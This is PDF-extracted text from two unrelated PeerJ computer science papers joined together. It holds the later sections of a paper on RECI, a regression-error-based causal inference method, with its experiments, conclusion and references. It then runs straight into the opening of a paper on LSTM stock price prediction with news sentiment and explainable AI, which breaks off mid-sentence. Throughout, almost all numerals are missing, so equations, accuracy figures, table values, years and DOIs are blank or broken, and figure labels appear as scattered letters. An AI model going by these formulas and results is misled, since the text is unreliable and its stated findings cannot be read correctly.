a dependency and an independency between c and n and anm only the latter, it can be expected that reci performs significantly better than anm in cases where the dependency between c and n is strong. this is evaluated in ‘simulated cause–effect pairs with strong dependent noise’. in comparison with pnl, slope, igci, lingam and cure, reci outperforms in almost all data sets. note that mooij et al. ( ) performed more extensive experiments and showed more comparisons with anm and igci in these data sets, where additional parameter configurations were tested. however, they reported no results for the preprocessed data. simulated cause–effect pairs with strong dependent noise since the data sets of the evaluations in ‘simulated benchmark cause–effect pairs’ are generated by structural equations with independent noise variables, we additionally performed evaluations with artificial data sets where the input distribution and the noise distribution are strongly dependent. for this, we considered a similar data generation process as described in the work by daniušis et al. ( ). we generated data with various cause and noise distributions, different functions and varying values for α∈[ , ]. in order to ensure a dependency between c and n , we additionally introduced two unobserved source variables s and s that are randomly sampled from different distributions. variables c and n then consist of a randomly weighted linear combination of s and s . the general causal structure of these data sets is illustrated in fig. . note that s and s can be seen as hidden confounders affecting both c and e. apart from rather simple functions for φ, daniušis et al. ( ) proposed to generate more general functions in the form of convex combinations of mixtures of cumulative gaussian distribution functions ψ(c|µi,σi): sn(c)= n∑ i= βiψ(c|µi,σi), where βi,µi ∈[ , ] and σi ∈[ , . ]. for the experiments, we set n= and chose the parameters of s (c) randomly according to the uniform distribution. note that ψ(c|µi,σi) blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the general structure of the data generation process where c and n are dependent. in order to achieve this, cause and noise consist of a mixture of two sources s and s . full-size doi: . /peerjcs. /fig- is always monotonically increasing and thus s (c) can have an arbitrary random shape while being monotonically increasing. cause-effect pairs were then generated in the following way w ,w ∼u( , ) s ,s ∼ps s =s −e[s ] s =s −e[s ] c′=w ·f (s )+( −w )·f (s ) n ′=w ·f (s )+( −w )·f (s ) c =normalize(c′) n =α ·standardize(n ′) e =φ(c)+n, where the distributions of s and s and the functions f ,f ,f ,f were chosen randomly from ps and f in table , respectively. note that s and s can follow different distributions. the choice of φ depends on the data set, where we differentiated between three data sets: • linear: only the identity function φ(c)=c • invertible: arbitrary invertible functions φ(c)= s (c) • non-invertible: functions that are not invertible on the respective domain in total, we generated data sets for each value of parameter α, which controls the amount of noise in the data. in each generated data set, we randomly chose different distributions and functions. for linear and non-invertible the step size of α is . and for invertible . . here, we only performed one repetition on each data set for all algorithms. figs. a– c summarize all results and table in the supplements shows the best performing functions and parameters of the different causal inference methods. note that we omitted experiments with cure in these data sets due to the high computational cost. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table all distributions ps, functions φ and functions f that were used for the generation of the linear, non-invertible and invertible data sets. in case of the functions for non-invertible, rescale (x,−n,n) denotes a rescaling of the input data x on [−n,n]. gmµ,σ denotes a gaussian mixture distribution with density pgmµ,σ (c)= (ϕ(c|µ ,σ )+ϕ(c|µ ,σ )) and gaussian pdf ϕ(c|µ,σ). data set φ(c) linear c ps f (x) invertible s (c) u( , ) x non-invertible rescale(c,− , ) n( ,σ ) exp(x) rescale(c,− , ) n( . ,σ ) s (x) sin(rescale(c,− ·π, ·π)) n( ,σ ) gm[ . , . ]t,[ . , . ]t . . . . . . . . a c c u ra c y reci anm igci lingam slope pnl . . . . . . . . a c c u ra c y reci anm igci lingam slope pnl (a) linear (b) invertible . . . . . . . . a c c u ra c y reci anm igci lingam slope pnl (c) non-invertible figure evaluation results of all methods in the (a) linear, (b) invertible and (c) non-invertible data sets. the parameter α controls the amount of noise in the data. full-size doi: . /peerjcs. /fig- linear: as expected, anm, pnl, slope, igci and reci perform very poorly, since they require nonlinear data. in case of reci, theorem states an equality of the mse if the func- tional relation is linear and, thus, the causal direction can not be inferred. while lingam performs well for α= . , and probably for smaller values of α too, the performance blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. drops if α increases. the poor performances of lingam and anm can also be explained by the violation of its core assumption of an independence between cause and input. invertible: in this data set, igci performs quite well for small α, since all assumptions approximately hold, but the performance decreases when the noise becomes stronger and violates the assumption of a deterministic relation. in case of reci, we made a similar observation, but it performs much better than igci if α< . . aside from the assumption of linear data for lingam, the expected poor performance of lingam and anm can be explained by the violation of the independence assumption between c and n . in contrast to the previous results, pnl performs significantly better in this setting than anm, although, likewise lingam and anm, the independence assumption is violated. non-invertible: these results seem very interesting, since it supports the argument that the error asymmetry becomes even clearer if the function is not invertible due to an information loss of regressing in anticausal direction. here, igci and slope perform reasonably well, while anm and lingam perform even worse than a baseline of just guessing. comparing anm and pnl, pnl has a clear advantage, although the overall performance is only slightly around % in average. the constant results of each method can be explained by the rather simple and similar choice of data generating functions. while the cause and noise also have a dependency in the sim-c data sets, the performance gap between anm and reci is vastly greater in invertible and non-invertible than in sim-c due to a strong violation of the independent noise assumption. therefore, reci might perform better than anm in cases with a strong dependency between cause and noise. real-world data in real-world data, the true causal relationship generally requires expert knowledge and can still remain unclear in cases where randomized controlled experiments are not possible. for our evaluations, we considered the commonly used cause–effect pairs (cep) benchmark data sets for inferring the causal direction in a bivariate setting. these benchmark data sets provided, at the time of these evaluations, data sets with given cause and effect variables and can be found on https://webdav.tuebingen.mpg.de/cause-effect/. however, since we only consider a two variable problem, we omit six multivariate data sets, which leaves data sets for the evaluations. these data sets consist of a wide range of different scenarios, such as data from time dependent and independent physical processes, sociological and demographic studies or biological and medical observations. an extensive analysis and discussion about the causal relationship of the first data sets can be found in the work by mooij et al. ( ). each data set comes with a corresponding weight determined by expert knowledge. this is because several data sets are too similar to consider them as independent examples, hence they get lower weights. therefore, the weight wm in eq. ( ) depends on the corresponding data set. the evaluation setup is the same as for the artificial data sets, but we doubled the number of internal repetition of cure to eight times in order to provide the same conditions as in sgouritsa et al. ( ). figures a and b shows the results of the evaluations in the original and preprocessed data, respectively. in all cases, slope and reci perform significantly better than anm, blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://webdav.tuebingen.mpg.de/cause-effect/ http://dx.doi.org/ . /peerj-cs. the work of mooij et al. ( ) provides further evaluations of anm and igci in the original cep data set with parameter configurations that reached slightly higher accuracies than the presented results in this work. regarding cure, we had to use a simplified implementation due to the high computational cost, which did not perform as well as the results reported in sgouritsa et al. ( ). algorithm and algorithm are equivalent if t = . a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y (a) original cep (b) preprocessed cep figure evaluation results of all methods in the real-world cep data sets. (a) shows the result of the evaluations in the original data and (b) the results in the preprocessed versions where low-density points were removed. full-size doi: . /peerjcs. /fig- pnl, igci, cure and lingam. while slope performs slightly better in the original data sets than reci, reci performs better overall in the preprocessed data . further, the performance gap even increases in the preprocessed data with removed low-density points. surprisingly, as table in the supplements indicates, the simple shifted monomial function ax +c performs the best, even though it is very unlikely that this function is able to capture the true function φ. we obtained similar observations in the artificial data sets, where the simple logistic function oftentimes performs the best. in order to show that reci still performs reasonably well under a different scaling, we also evaluated reci in the real-world data set with standardized data. these results can be found summarized in figures (a)– (b) in the supplements and more detailed in table and table in the supplements. while standardizing the data improves the performance in the sim-g data, it slightly decreases the performance in the real-world data as compared to a normalization of the data, but still performs reasonably well. this shows some robustness with respect to a different scaling. error ratio as rejection criterion it is not clear how a confidence measure for the decision of reci can be defined. however, since theorem states that the correct causal direction has a smaller error, we evaluated the idea of utilizing the error ratio for a confidence measure in terms of: confidence= − min(e[var[x|y]],e[var[y |x]]) max(e[var[x|y]],e[var[y |x]]) , ( ) the idea is that, the smaller the error ratio, the higher the confidence of the decision, due to the large error difference. note that we formulated the ratio inverse to theorem in order to get a value on [ , ]. algorithm can be modified in a straight forward manner to utilize this confidence measure. the modification is summarized in algorithm . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm causal inference algorithm that uses eq. ( ) as rejection criterion. function reci(x, y , t) fx and y are the observed data and t ∈[ , ] is the confidence threshold for rejecting a decision. (x,y )←rescaledata(x,y ) f ←fitmodel(x,y ) ffit regression model f : x →y g ←fitmodel(y,x) ffit regression model g : y →x msey |x ←meansquarederror(f ,x,y ) msex|y ←meansquarederror(g,y,x) ξ ← − min(msex|y ,msey |x )max(msex|y ,msey |x ) if ξ ≥ t then if msey |x <msex|y then return x causes y else return y causes x end if else return no decision end if end function we re-evaluated the obtained results by considering only data sets where algorithm returns a decision with respect to a certain confidence threshold. figs. a– d show some examples of the performance of reci if we use eq. ( ) to rank the confidence of the decisions. a decision rate of %, for instance, indicates the performance when we only force a decision on % of the data sets with the highest confidence. in this sense, we can get an idea of how useful the error ratio is as rejection criterion. while figs. a, c and d support the intuition that the smaller the error ratio, the higher the chance of a correct decision, fig. b has a contradictive behavior. in fig. b, it seems that a small error ratio (big error difference) is rather an indicator for an uncertain decision (probably caused by over- or underfitting issues). therefore, we can not generally conclude that eq. ( ) is a reliable confidence measure in all cases, but it seems to be a good heuristic approach in the majority of the cases. more plots can be found in the supplements, where fig. shows the plots in the original data, fig. in the preprocessed data and fig. in the standardized data. note that a deeper analysis of how to define an appropriate confidence measure for all settings is beyond the scope of this paper and we rather aim to provide some insights of utilizing the error ratio for this purpose. run-time comparison in order to have a brief overview and comparison of the run-times, we measured the execution durations of each method in the evaluation of the original cep data sets. all measures were performed with a intel xeon e - v processor. table summarizes the measured run-times, where we stopped the time measurement of cure after s. as the table indicates, igci is the fastest method, followed by lingam and reci. the blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. decision rate (%) a c c u ra c y ( % ) decision rate (%) a c c u ra c y ( % ) decision rate (%) a c c u ra c y ( % ) decision rate (%) a c c u ra c y ( % ) (a) cep-log (b) sim-log (c) sim-c-nn (d) sim-ln-poly figure the exemplary performance of reci if a certain decisions rate is forced. (a) cep-log, (b) sim-log, (c) sim-c-nn, (d) sim-ln-poly. here, the decisions are ranked according to the confidence measure defined in eq. ( ). full-size doi: . /peerjcs. /fig- table the average run-time in seconds of each method using all cep data sets. method time (s) anm-hsic . ± . anm-ent . ± anm-fn . ± . pnl . ± . slope . ± . igci-u . ± . igci-u . ± . igci-u . ± . igci-g . ± . igci-g . ± . igci-g . ± . cure > lingam . ± . reci-log . ± . reci-mon . ± . reci-poly . ± . reci-svr . ± . reci-nn . ± . ranking of anm, pnl, slope and reci is not surprising; anm and pnl need to evaluate the independence between input and residual on top of fitting a model. in case of slope, multiple regression models need to be fitted depending on a certain criterion that requires to be evaluated. therefore, by construction, reci can be expected to be faster than anm, pnl and slope. discussion due to the greatly varying behavior and the choice of various optimization parameters, a clear rule of which regression function is the best choice for reci remains an unclear and difficult problem. overall, it seems that simple functions are better in capturing the error asymmetries than complex models. however, a clear explanation for this is still lacking. a possible reason for this might be that simple functions in causal direction already achieve blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a small error, while in anticausal direction, more complex models are required to achieve a small error. to justify speculative remarks of this kind raises deep questions about the foundations of causal inference. according to eq. ( ), it is possible to conclude that the joint distribution has a simpler description in causal direction than in anticausal direction. seeing this, a model selection based on the regression performance and model complexity considered in a dependent manner might further improve reci’s practical applicability. regarding the removal of low-density points, the performance of methods that are based on the gaussiantiy assumption, such as fn and igci with gaussian reference measure, seems not to be influenced by the removal. on the other hand, the performance of hsic, ent, and igci with uniform measure is negatively affected, while the performance of lingam and reci increases. in case of reci, this can be explained by a better estimation of the true mse with respect to the regression function class. regarding the computational cost, we want to emphasize again that reci, depending on the implementation details, can have a significantly lower computational cost than anm, slope and cure, while providing comparable or even better results. further, it can be easily implemented and applied. conclusion we presented an approach for causal inference based on an asymmetry in the prediction error. under the assumption of an independence among the data generating function, the noise, and the distribution of the cause, we proved (in the limit of small noise) that the conditional variance of predicting the cause by the effect is greater than the conditional variance of predicting the effect by the cause. for instance, in the example shown in fig. , the regression error in the true causal direction is smaller than the error in the anticausal direction. in our work, the additive noise is not assumed to be independent of the cause (in contrast to so-called additive noise models). the stated theorem might also be interesting for other statistical applications. we proposed an easily implementable and applicable algorithm, which we call reci, that exploits this asymmetry for causal inference. the evaluations show supporting results and leave room for further improvements. by construction, the performance of reci depends on the regression method. according to our limited experience so far, regression with simple model classes (that tend to underfit the data) performs reasonably well. to clarify whether this happens because the conditional distributions tend to be simpler—in a certain sense—in causal direction than in anticausal direction has to be left for the future. additional information and declarations funding this work was supported by jst crest grant number jpmjcr and jsps kakenhi grant number jp k , japan. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: st crest: jpmjcr . jsps kakenhi: jp k . competing interests the authors declare there are no competing interests. author contributions • patrick blöbaum conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • dominik janzing and takashi washio conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • shohei shimizu and bernhard schölkopf conceived and designed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: real-world data can be found at: https://webdav.tuebingen.mpg.de/cause-effect/ artificial data can be found at: http://jmlr.org/papers/v / - .html. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references blöbaum p, janzing d, washio t, shimizu s, schölkopf b. . cause-effect inference by comparing regression errors. in: proceedings of the st international conference on artificial intelligence and statistics (aistats ). blöbaum p, shimizu s, washio t. . a novel principle for causal inference in data with small error variance. in: european symposium on artificial neural networks. louvain-la-neuve, belgium: i doc, – . blöbaum p, washio t, shimizu s. . error asymmetry in causal and anticausal regression. behaviormetrika ( ): – . comley jw, dowe dl. . general bayesian networks and asymmetric languages. in: proceedings of the second hawaii international conference on statistics and related fields. daniušis p, janzing d, mooij j, zscheischler j, steudel b, zhang k, schölkopf b. . inferring deterministic causal relations. in: proceedings of the th conference on uncertainty in artificial intelligence. corvallis: auai press, – . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://webdav.tuebingen.mpg.de/cause-effect/ http://jmlr.org/papers/v / - .html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. hoyer p, janzing d, mooij j, peters j, schölkopf b. . nonlinear causal discovery with additive noise models. in: advances in neural information processing systems . red hook: curran associates, inc., – . hyvärinen a, smith s. . pairwise likelihood ratios for estimation of non-gaussian structural equation models. journal of machine learning research (jan): – . janzing d, mooij j, zhang k, lemeire j, zscheischler j, daniušis p, steudel b, schölkopf b. . information-geometric approach to inferring causal directions. artificial intelligence : – doi . /j.artint. . . . janzing d, schölkopf b. . causal inference using the algorithmic markov condition. ieee transactions on information theory ( ): – doi . /tit. . . janzing d, sun x, schölkopf b. . distinguishing cause and effect via second order exponential models. eprint http://arxiv.org/abs/ . . kano y, shimizu s. . causal inference using nonnormality. in: proceedings of the international symposium on science of modeling, the th anniversary of the information criterion. tokyo, – . lemeire j, janzing d. . replacing causal faithfulness with algorithmic independence of conditionals. minds and machines ( ): – doi . /s - - - . ma s, statnikov a. . methods for computational causal discovery in biomedicine. behaviormetrika ( ): – doi . /s - - - . marx a, vreeken j. . telling cause from effect using mdl-based local and global re- gression. in: ieee international conference on data mining (icdm). piscataway: ieee, – doi . /icdm. . . mooij j, peters j, janzing d, zscheischler j, schölkopf b. . distinguishing cause from effect using observational data: methods and benchmarks. journal of machine learning research ( ): – . pearl j. . causality: models, reasoning and inference. nd edition. new york: cambridge university press. peters j, janzing d, schölkopf b. . causal inference on discrete data using additive noise models. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . peters j, janzing d, schölkopf b. . elements of causal inference—foundations and learning algorithms. cambridge: mit press. rissanen j. . modeling by shortest data description. automatica ( ): – doi . / - ( ) - . rosner f. . the ethics of randomized clinical trials. the american journal of medicine ( ): – doi . / - ( ) - . schölkopf b, janzing d, peters j, sgouritsa e, zhang k, mooij j. . semi-supervised learning in causal and anticausal settings. in: schölkopf b, luo z, vovk v, eds. empirical inference. festschrift in honor of vladimir vapnik, berlin, heidelberg: springer-verlag, – doi . / - - - - _ . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . /tit. . http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /icdm. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. sgouritsa e, janzing d, hennig p, schölkopf b. . inference of cause and effect with unsupervised inverse regression. in: artificial intelligence and statistics. san diego: pmlr, – . shimizu s, hoyer p, hyvärinen a, kerminen a. . a linear non-gaussian acyclic model for causal discovery. journal of machine learning research : – . spirtes p, glymour c, scheines r. . causation, prediction, and search. cambridge: mit press. statnikov a, henaff m, lytkin ni, aliferis cf. . new methods for separating causes from effects in genomics data. bmc genomics ( ):s doi . / - - -s -s . sun x, janzing d, schölkopf b. . causal inference by choosing graphs with most plausible markov kernels. in: proceedings of the th international symposium on artificial intelligence and mathematics. fort lauderdale, fl, – . zhang k, hyvärinen a. . on the identifiability of the post-nonlinear causal model. in: proceedings of the th conference on uncertainty in artificial intelligence. arlington: auai press, – . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /peerj-cs. submitted august accepted november published january corresponding authors hrituja khatavkar, hrituja.khatavkar@sitpune.edu.in ketan kotecha, head@scaai.siu.edu.in academic editor rajanikanth aluvalu additional information and declarations can be found on page doi . /peerj-cs. copyright gite et al. distributed under creative commons cc-by . open access explainable stock prices prediction from financial news articles using sentiment analysis shilpa gite , hrituja khatavkar , ketan kotecha , shilpi srivastava , priyam maheshwari and neerav pandey symbiosis institute of technology, symbiosis international (deemed university), pune, maharashtra, india symbiosis center for applied artificial intelligence (scaai), symbiosis international (deemed university), pune, maharashtra, india abstract the stock market is very complex and volatile. it is impacted by positive and negative sentiments which are based on media releases. the scope of the stock price analysis relies upon ability to recognise the stock movements. it is based on technical fundamentals and understanding the hidden trends which the market follows. stock price prediction has consistently been an extremely dynamic field of exploration and research work. however, arriving at the ideal degree of precision is still an enticing challenge. in this paper, we are proposing a combined effort of using efficient machine learning techniques coupled with a deep learning technique—long short term memory (lstm)—to use them to predict the stock prices with a high level of accuracy. sentiments derived by users from news headlines have a tremendous effect on the buying and selling patterns of the traders as they easily get influenced by what they read. hence, fusing one more dimension of sentiments along with technical analysis should improve the prediction accuracy. lstm networks have proved to be a very useful tool to learn and predict temporal data having long term dependencies. in our work, the lstm model uses historical stock data along with sentiments from news items to create a better predictive model. subjects artificial intelligence, data mining and machine learning keywords long short-term memory (lstm), explainable ai(xai), stock price prediction, deep learning introduction stock market investment/trading can be very tricky and stressful but rewarding if predicted correctly. it has been an object of study for the past many decades and is a complex task because of the large number of parameters, disordered information, and dynamism. several technical indicators and sources of information affect the stock prices, but due to the substantial amount of data present, it becomes difficult to predict the prices. however, with the advancement in technology, particularly in processing large chunks of temporal data, the field is continuously improving to achieve better prediction accuracy. there is a famous hypothesis in finance called the efficient market hypothesis, which states that asset prices cannot entirely depend on obsolete information and market prices react to new information, for example, financial news articles, social media blogs, etc (Ţiţan, how to cite this article gite s, khatavkar h, kotecha k, srivastava s, maheshwari p, pandey n. . explainable stock prices prediction from financial news articles using sentiment analysis. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:hrituja.khatavkar@sitpune.edu.in mailto:head@scaai.siu.edu.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. ). these sources change the sentiments of the investor and the traders. with the advancement in artificial intelligence, information coming from both financial time series, which captures sentiments and other technical analysis data, can be fused to predict stock prices. in this paper, we suggest a technique involving lstm and the interpretability power of explainable ai (xai) for visual representations to provide a definite outline that helps them anticipate their future stock prices. the data we are using is the national stock exchange (nse) and the news headlines aggregated from pulse (pulse by zerodha, ). pulse has aggregated , + indian finance news headlines from various news websites like business standard, the hindu business, reuter, and many other news websites. state-of-the-art techniques cho et al. ( ) proved that the recurrent neural network (rnn) is a powerful model for processing context information from textual data. however, to tackle long-term dependencies, the variant of rnn, lstm, has proved to be very effective in handling complex tasks for text processing and language modeling on temporal data (sherstinsky, ). we propose using lstm for news classification for sentiments, employing the interactions of words during the compositional process. lstm incorporates a memory cell, which is a unit of computation that supersedes the traditional deep learning neurons in the network (moghar & hamiche, ; egeli, ozturan & badur, ). to understand the behavior of the proposed model, we also intend to make our model explainable. xai aims to develop a collection of machine learning techniques that produce more explainable models (doran, schulz & besold, ). using xai techniques, we wish to provide knowledge about the prediction made by the model so that the user can get insights for future trading/investment strategies. the model can be interpreted by visual tools, which can help us to consider the biases in the model before making the final decision. kalyani, bharathi & rao ( ) in their research, using supervised machine learning for classification of news headlines and additional text mining techniques to examine news polarity. the news articles with its polarity score and text converted to tf-idf vector space are fed to the classifier. three different classification algorithms (support vector machines ‘‘svm’’, naïve bayes and random forest) are implemented to investigate and enhance classification accuracy. results of all three algorithms are compared based on precision, recall, accuracy, and other model evaluation techniques. when evaluating the results of all classifiers, the svm classifier performs satisfactorily for unknown data. the random forest also showed better results when compared to the naïve bayes algorithm. finally, the relationship between news articles and stock price data are plotted. nayak, pai & pai ( ) used the historical data from obtained from yahoo finance and used two models to predict the stock trend. one model was built for the prediction of daily stock by considering all the data available daily. the second model that was built was for monthly prediction of stocks, and it considered data available every month. also, two different datasets were used for each model. a historical price dataset was used for the daily prediction model and historical data from obtained from yahoo finance is gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. used for a monthly prediction model. the dataset was modeled using various models like boosted decision tree, logistic regression, and support vector machine. up to % accuracy was observed using the support vector machine. vargas, lima & evsuko ( ) proposed a recurrent convolutional neural network model. it predicts intraday movements of the s&p record. the model data sources financial news headlines from the day past of the forecast day and utilizes a few specialized indicators which are extracted from the primary target. every news is processed through a two-step procedure—initially, a word vec model to create a vector to display each word, and afterward they implement the mean (average) of all the word vectors of the same title. the rcnn model uses deep learning models: cnn and rnn. the cnn model is utilized to separate rule base data from the text while the rnn-lstm model is utilized to get the context information and to interpret the stock information attributes for forecast purposes. yoo, kim & jan ( ) analyzed and assessed a portion of the current ml techniques for stock exchange prediction. after comparing various models like multivariate regression, neural networks, support vector machines, and case-based reasoning models, they inferred that neural networks offer the capacity to predict market trends accurately when contrasted with different procedures. svms and case-based reasoning are famous for predicting stock costs due to their simplicity of use and implementation. lstm lstm (long short-term memory) is an improved form of rnn. lstm models avoid the problems encountered by rnn. hochreiter & schmidhuber ( ) introduced lstms that make use of memory cells that can either forget unnecessary information or store information for more extended periods. lstms are explicitly modeled to handle tasks involving historical texts and are also able to educate themselves on long term dependencies. with the help of memory cells, they are capable of educating themselves. lstms have a chain-like structure making it easier to pass on information. the information is passed on as a state of the cell from one memory cell to another. the output of the network is modified by the state of these cells. the architecture of lstm allows for constant error flow with the help of constant, self-connected units (hochreiter & schmidhuber, ). this flow of error and states is propagated with the help of the three gates: input gate, output gate and forget gate, that each lstm memory cell block is composed of. input gates modulate the amount of new information received by a cell, forget gates determine what amount of information from the previous cell is passed on to the current cell; they determine what information is relevant and what information needs to be forgotten (kim & won, ). given below in fig. a is the structure of simple recurrent network (srn). as compared to srn, lstm-cell given in fig. b is different and has multiple gates. lstm model has two passes: • forward pass, and • backward pass gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure detailed schematic of the simple recurrent network (srn) unit (a) and a long short-term memory block (b) as used in the hidden layers of a recurrent neural network. full-size doi: . /peerjcs. /fig- forward propagation in neural networks, the storage and calculation of intermediate results in the sequence from the input layer to the output layer are called forward propagation. in this propagation, we work incrementally through the mechanics of a deep network with one hidden layer. it consists of the processing of weighted inputs through the activation function. forward propagation is done to get a value. we then compare this computed value with the real value to further compute the error. then, in backward propagation, we calculate the derivative of the error with respect to the weights. then we subtract the value obtained from the value of the weight. the final step in a forward pass (vargas, lima & evsuko, ) is to the comparison between the predicted and the expected output. forward propagation is calculated using the following steps: z[i]=w[i]a[i− ]+b[i− ] ( . ) g[i](z)=σ(z[i]). ( . ) backpropagation backpropagation (vargas, lima & evsuko, ) is analogous to calculating the delta rule for a multilayer feedforward network. backpropagation is the method to calculate the gradient of neural network parameters. the main aim of backpropagation is to minimize the cost function by weights and biases of the network. the amount of adjustment to be made is determined by the gradients of the cost function for the respective parameters. assuming we have the following functions: q= f (p) ( . ) r=g(q) ( . ) g(q)=g◦f (p). ( . ) gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where, the input and the output p, q, r are tensors of arbitrary shapes. by using the chain rule, we can compute the derivative of r wrt p: dr/dp=dot(dr/dq,dq/dp). ( . ) a forward pass let xt be the input for time t, n be the quantity of lstm blocks, m is the number of inputs. we then get the subsequent weights for lstm layer: •input weights: wz, wi , wf , wo ∈ rn×m •recurrent weights: rz, ri , rf , ro ∈ rn×n •peephole weights: pi , pf , po ∈ rn •bias weights: bz, bi , bf , bo ∈ rn then the vector formulas for a vanilla lstm layer forward pass can be written as: zt=wzx t +rzy t− +bz ( . ) zt=g(zt) block input ( . ) it=wix t +riy t− +pi�c t− +bi ( . ) it=σ(it) input gate ( . ) f t=wfx t +rfy t− +pf�c t− +bf ( . ) f t=σ(f t) forget gate ( . ) f t=wfx t +rfy t− +pf�c t− +bf cell ( . ) ft=σ(f t) ( . ) ct=zt�it+ct− �ft ( . ) ot=wox t +roy t− +po�c t +bo ( . ) ot=σ(ot) ( . ) yt=h(ct)�ot output gate ( . ) where σ , g and h are pointwise non-linear activation functions. the logistic sigmoid (σ(x)= / +e −x) is employed as an activation function and also the tangent hyperbole (g(x) = h(x) = tanh(x)) is typically used because the block input and output activation function. pointwise multiplication of vectors is denoted by � (greff et al., ) . b. backpropagation calculation of deltas in lstm block: δyt= t+rtz δ t+ z +r t i δ t+ i +r t f δ t+ f +r t oδ t+ o ( . ) δot=δyt�h(ct)σ ′(ot) ( . ) δct=δyt�ot�h′(ct)+po�δo t +pi�δi t+ +pf�δf t+ +δct+ �ft+ . ( . ) gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. here, t is the vector of deltas delegated from the layer above. if e is the loss function, it corresponds to ∂e ∂yt , but not counting the recurrent dependencies (pathmind, inc., ). then: δf t=δct�ct− �σ ′(f t) ( . ) why lstm? lstm networks various state cells. these short and long-term memory cells rely on the state of these cells. these memory cells act as an aide for the model to remember historical context as predictions made by the network are influenced by past experiences of inputs to the network. this helps us make better predictions. lstm networks tend to keep the context of information fed by inputs by integrating a loop that allows information to flow, in one direction i.e from one step to the following. explainable ai (xai) we want our model to output not only the prediction part but also the explanation as to why the prediction turned out that way. if our machine makes a prediction, why should the user trust the prediction made by the machine? today, machine learning and artificial intelligence(ai) are exploited to make decisions in many fields like medical, finance, and sports. there are cases where machines aren’t % accurate. so, the user should blindly trust the choice of the machine? how can the user trust ai systems that derive inferences on probable unfair grounds? to solve the problem of trust between the user and artificial intelligence, xai (saffar, ) can be employed. it gives us the reasoning for a prediction made by the model. mainly xai is employed to resolve the black box problem. this ’’black box’’ phase is interpreted by xai and explained to the users. the user cannot completely depend on the model without a clear understanding of the model and the way the output is achieved. xai provides a clear understanding of how the model achieved a certain prediction or result. xai gives a human-understandable explanation for the prediction. current models enable interpretation but leave it to the user to apply their knowledge, bias and understanding. methodology given below is a systematic representation of how the data served to the system, how the model is trained and tested. and how xai works to interpret the model. system design figure explains the overall architecture of the system. we preprocess the news headlines dataset by performing tokenization, removing stop words, and embedding it. the headlines are then normalized and sentiment analysis is performed on it to comprehend the sentiment behind each sentiment, i.e whether a particular headline has a positive or negative sentiment associated with it. we then use the preprocessed headlines to classify them. we classify them to analyze whether they produce a positive sentiment or a negative sentiment. later, this headline dataset, along with the preprocessed yahoo finance dataset, is combined to gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure system architecture of stock market prediction using lstm and xai. shows how the data is initially processed, divided into train and test set to build further predictions and evaluate the biases using xai. full-size doi: . /peerjcs. /fig- form the final dataset. then the dataset is divided into train and test dataset. the training dataset is used to build the lstm model. the test dataset to verify the results obtained after training. finally, xai is implemented using the lime tool that is used to interpret the model and understand the biases involved in the dataset. algorithm the algorithm is divided into prediction of the opening price using lstm-cnn and xai for interpreting the model. given below is 